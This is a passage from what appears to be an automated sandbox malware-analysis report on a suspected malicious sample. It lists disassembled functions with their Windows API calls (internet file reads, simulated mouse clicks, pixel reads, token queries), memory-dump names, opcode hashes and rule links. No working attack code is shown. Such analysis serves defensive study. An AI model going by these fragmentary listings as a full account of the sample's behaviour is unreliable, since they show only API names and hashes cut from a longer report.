                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 000B9052
                                                                                        • Part of subcall function 0004F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,000A1043,?,7529E610), ref: 0004F6E6
                                                                                        • Part of subcall function 0004F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0008FA64,00000000,00000000,?,?,000A1043,?,7529E610,?,0008FA64), ref: 0004F70D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                      • String ID:
                                                                                      • API String ID: 666041331-0
                                                                                      • Opcode ID: e89784f938d645c4b687b311ef24550106e1871519d6ac79896685f3b4f7d312
                                                                                      • Instruction ID: 6d05004bf1c1ae1f4aac52dffe36ade55c3aecc79bf02e13a4cf3b08b67a106a
                                                                                      • Opcode Fuzzy Hash: e89784f938d645c4b687b311ef24550106e1871519d6ac79896685f3b4f7d312
                                                                                      • Instruction Fuzzy Hash: B4513535604205DFCB15EF58C4949EDBBF5FF49314B0880A8E90A9B362DB31ED86CB90
                                                                                      Function 00062051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free
                                                                                      • String ID:
                                                                                      • API String ID: 269201875-0
                                                                                      • Opcode ID: 389624b06611f0b3e4b571c9cc54f5a921d94351b84027db2c6c91a2c752d478
                                                                                      • Instruction ID: b9fb26bbc569e532555f41e19d0d21658d7c5ddb18b9564153c95865b5d6d70e
                                                                                      • Opcode Fuzzy Hash: 389624b06611f0b3e4b571c9cc54f5a921d94351b84027db2c6c91a2c752d478
                                                                                      • Instruction Fuzzy Hash: 2A41E472A006049FDB24DF78C981AADB7F6EF89314F154569EA15EB352DB31AD01CB80
                                                                                      Function 000A3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetInputState.USER32 ref: 000A38CB
                                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 000A3922
                                                                                      • TranslateMessage.USER32(?), ref: 000A394B
                                                                                      • DispatchMessageW.USER32(?), ref: 000A3955
                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000A3966
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                      • String ID:
                                                                                      • API String ID: 2256411358-0
                                                                                      • Opcode ID: 92f2932fc2d75a8a87fba7611ebbd7c55c1b9ba5c198474d81bc96b8ea902458
                                                                                      • Instruction ID: 7d5ed7428707f3956824106689c40f10c0da8732824460de69c449ad79d3f374
                                                                                      • Opcode Fuzzy Hash: 92f2932fc2d75a8a87fba7611ebbd7c55c1b9ba5c198474d81bc96b8ea902458
                                                                                      • Instruction Fuzzy Hash: F7319E70904342AEFB75CBA4D848FB737E8AB07304F04456EF4A6865E0E7F89A85CB11
                                                                                      Function 000ACF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,000AC21E,00000000), ref: 000ACF38
                                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 000ACF6F
                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFB4
                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFC8
                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                      • String ID:
                                                                                      • API String ID: 3191363074-0
                                                                                      • Opcode ID: 16b07ba5a658368d6e3bddef3ecd49a7241f4770aca556bdd3d2c0dcf31100a6
                                                                                      • Instruction ID: 2879c64e82f0e4e1a220bf197012da72afc058d9727206169a91b6b402afbd62
                                                                                      • Opcode Fuzzy Hash: 16b07ba5a658368d6e3bddef3ecd49a7241f4770aca556bdd3d2c0dcf31100a6
                                                                                      • Instruction Fuzzy Hash: 9C3169B1A04205AFFB20DFE5C884EABBBF9EB15350B11443EF50AD2111DB30AE41DBA0
                                                                                      Function 00091901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowRect.USER32(?,?), ref: 00091915
                                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 000919C1
                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 000919C9
                                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 000919DA
                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 000919E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3382505437-0
                                                                                      • Opcode ID: 1d650847a08c5d7d90abdd6d7c2ab61fd7c2ecd22bdb713c91aba44caf9ab38d
                                                                                      • Instruction ID: 7df250e95047360e7a4141d0f38a99e56ce4f24971e6139532908b3118872a86
                                                                                      • Opcode Fuzzy Hash: 1d650847a08c5d7d90abdd6d7c2ab61fd7c2ecd22bdb713c91aba44caf9ab38d
                                                                                      • Instruction Fuzzy Hash: 7031BF71A0021AEFEF10CFA8CD99EDE3BB5EB05315F104229F925A72D1C7709944DB90
                                                                                      Function 000C5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 000C5745
                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 000C579D
                                                                                      • _wcslen.LIBCMT ref: 000C57AF
                                                                                      • _wcslen.LIBCMT ref: 000C57BA
                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 000C5816
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 763830540-0
                                                                                      • Opcode ID: cb15dff041c471d74227072374fd56f152fc35135770a84b74756b5b96d7861c
                                                                                      • Instruction ID: 9b18677795a20835dc1fb050598198edf5b8e1d67fb11151c0c1d4ac0c69937f
                                                                                      • Opcode Fuzzy Hash: cb15dff041c471d74227072374fd56f152fc35135770a84b74756b5b96d7861c
                                                                                      • Instruction Fuzzy Hash: AC21A5359046189ADB209F60DC85FEE77BCFF04326F10825AE919EA181D770AAC5CF50
                                                                                      Function 000B0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsWindow.USER32(00000000), ref: 000B0951
                                                                                      • GetForegroundWindow.USER32 ref: 000B0968
                                                                                      • GetDC.USER32(00000000), ref: 000B09A4
                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 000B09B0
                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 000B09E8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                      • String ID:
                                                                                      • API String ID: 4156661090-0
                                                                                      • Opcode ID: fc4f8305ba3d7f2dafa8040372f3fdcbb8bab36bf65186407b2fea636b5bd669
                                                                                      • Instruction ID: da7c7aa746daf687b1b0a0a47875d91ce33538217e9213c06134dc2dab66edae
                                                                                      • Opcode Fuzzy Hash: fc4f8305ba3d7f2dafa8040372f3fdcbb8bab36bf65186407b2fea636b5bd669
                                                                                      • Instruction Fuzzy Hash: DC218E35600204AFE714EF65C988EEEBBE9EF49740F048068E84AE7762CB34AC04CB50
                                                                                      Function 0006CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0006CDC6
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006CDE9
                                                                                        • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006CE0F
                                                                                      • _free.LIBCMT ref: 0006CE22
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006CE31
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 336800556-0
                                                                                      • Opcode ID: b0d7846289686fdc78b31436ef16b12d4afbe1772f399c04d4d5975a923b0597
                                                                                      • Instruction ID: 67447c03cff0402dd761176dc95f327bb7a83c965d49644fbc945f2587af2601
                                                                                      • Opcode Fuzzy Hash: b0d7846289686fdc78b31436ef16b12d4afbe1772f399c04d4d5975a923b0597
                                                                                      • Instruction Fuzzy Hash: 8A018472A026557F332117B6AC88D7F79BEDFC6BA13190129FD49C7201EA6A8E0191F0
                                                                                      Function 00049639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00049693
                                                                                      • SelectObject.GDI32(?,00000000), ref: 000496A2
                                                                                      • BeginPath.GDI32(?), ref: 000496B9
                                                                                      • SelectObject.GDI32(?,00000000), ref: 000496E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                      • String ID:
                                                                                      • API String ID: 3225163088-0
                                                                                      • Opcode ID: d1a7c995cdfff8e943ee188c2380a5ba27dff0bda453fa35dafd300d94e2b35f
                                                                                      • Instruction ID: e16a095929775a27fdaccd210baab0ac4a4d435109c5ffdea00e793ae67c57ed
                                                                                      • Opcode Fuzzy Hash: d1a7c995cdfff8e943ee188c2380a5ba27dff0bda453fa35dafd300d94e2b35f
                                                                                      • Instruction Fuzzy Hash: 8A219570802305FFEB119F65EC08BAA3BA4BB55319F110235F894965B0D3B898D1CF98
                                                                                      Function 00095711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 2931989736-0
                                                                                      • Opcode ID: 4410af872f52d8041adfaa6bb68bc273e4007a4508afbff9a865e48397a2a1a7
                                                                                      • Instruction ID: 59045a8c0af6f50605717675dcf73ee52064bf3a39f55bce1d81e4f8c1830622
                                                                                      • Opcode Fuzzy Hash: 4410af872f52d8041adfaa6bb68bc273e4007a4508afbff9a865e48397a2a1a7
                                                                                      • Instruction Fuzzy Hash: CF01D671245605BA9A195652BE92FFFA39D9B20396B004024FE049E242F7B0EF14A3A1
                                                                                      Function 00062DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,?,0005F2DE,00063863,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6), ref: 00062DFD
                                                                                      • _free.LIBCMT ref: 00062E32
                                                                                      • _free.LIBCMT ref: 00062E59
                                                                                      • SetLastError.KERNEL32(00000000,00031129), ref: 00062E66
                                                                                      • SetLastError.KERNEL32(00000000,00031129), ref: 00062E6F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free
                                                                                      • String ID:
                                                                                      • API String ID: 3170660625-0
                                                                                      • Opcode ID: 6ccd3c7c14d3853c0a883e1bb5b0a454987bc60c4b685fc02a58ba8d9dce15d3
                                                                                      • Instruction ID: ea909cefce737d64908a6a13c55818d3e6d81e9b5755d353d147c489ac022432
                                                                                      • Opcode Fuzzy Hash: 6ccd3c7c14d3853c0a883e1bb5b0a454987bc60c4b685fc02a58ba8d9dce15d3
                                                                                      • Instruction Fuzzy Hash: 3D012836645E0167E72267747C46DAF269FEBD23B1B250038F425A32D3EF7A8C014170
                                                                                      Function 0009000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?,?,0009035E), ref: 0009002B
                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090046
                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090054
                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?), ref: 00090064
                                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090070
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 3897988419-0
                                                                                      • Opcode ID: 9831d8709aaa77137ec124fcd0ab1c35d52a8c679527b966efb261fb432bfc34
                                                                                      • Instruction ID: fd80ad919b9ee97255d77c4cb983b8d86fca87c96ad1d2ce2071c6857d4a19b0
                                                                                      • Opcode Fuzzy Hash: 9831d8709aaa77137ec124fcd0ab1c35d52a8c679527b966efb261fb432bfc34
                                                                                      • Instruction Fuzzy Hash: B4018F72600205BFEF108F68DC04FAE7AEDEB84751F144124F909D2210DB76DD44ABA0
                                                                                      Function 0009E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0009E997
                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 0009E9A5
                                                                                      • Sleep.KERNEL32(00000000), ref: 0009E9AD
                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0009E9B7
                                                                                      • Sleep.KERNEL32 ref: 0009E9F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                      • String ID:
                                                                                      • API String ID: 2833360925-0
                                                                                      • Opcode ID: 055f393a9abbec517a94ce8582e68a2a06fb648bec2c22745b9813252fc543b9
                                                                                      • Instruction ID: c2710bfbecb035797f76f9bce006e39e145eef5088fe881c377b2b908f2c9f10
                                                                                      • Opcode Fuzzy Hash: 055f393a9abbec517a94ce8582e68a2a06fb648bec2c22745b9813252fc543b9
                                                                                      • Instruction Fuzzy Hash: 8A015731C01669DBEF40EBE5DC59AEDBB78FB09700F050956E902B2241CB3899509BA1
                                                                                      Function 000910F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00091114
                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091120
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 0009112F
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091136
                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0009114D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 842720411-0
                                                                                      • Opcode ID: cc945112351372f665fb661deb96386264e48712c829480c3702112bf45a6b67
                                                                                      • Instruction ID: 2afe05695e78fd98d3b13492c723fee12919a15d39385e2cb964171c8ecddfbb
                                                                                      • Opcode Fuzzy Hash: cc945112351372f665fb661deb96386264e48712c829480c3702112bf45a6b67
                                                                                      • Instruction Fuzzy Hash: 4A013C75200205BFEB114FA5DC4DEAA3FAEEF8A3A0B244419FA49D7360DB35DD019B60
                                                                                      Function 00090FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00090FCA
                                                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00090FD6
                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00090FE5
                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00090FEC
                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00091002
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
